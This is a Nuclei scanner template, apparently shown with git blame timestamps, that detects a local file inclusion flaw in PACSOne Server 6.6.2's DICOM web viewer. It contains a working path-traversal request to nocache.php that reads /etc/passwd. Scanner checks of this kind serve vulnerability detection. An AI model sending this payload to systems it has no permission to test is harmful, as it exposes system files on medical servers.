2021-12-21 12:02:19 +00:00
|
|
|
id: pacsone-server-lfi
|
2021-12-21 03:58:01 +00:00
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: PACSOne Server 6.6.2 - Local File Inclusion
|
2021-12-21 03:58:01 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: PACSOne Server 6.6.2 is vulnerable to local file inclusion via its integrated DICOM Web Viewer.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://cxsecurity.com/issue/WLB-2018010303
|
2022-08-05 13:57:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2021-12-21 03:58:01 +00:00
|
|
|
tags: pacsone,lfi
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-08-05 13:57:51 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/08/04
|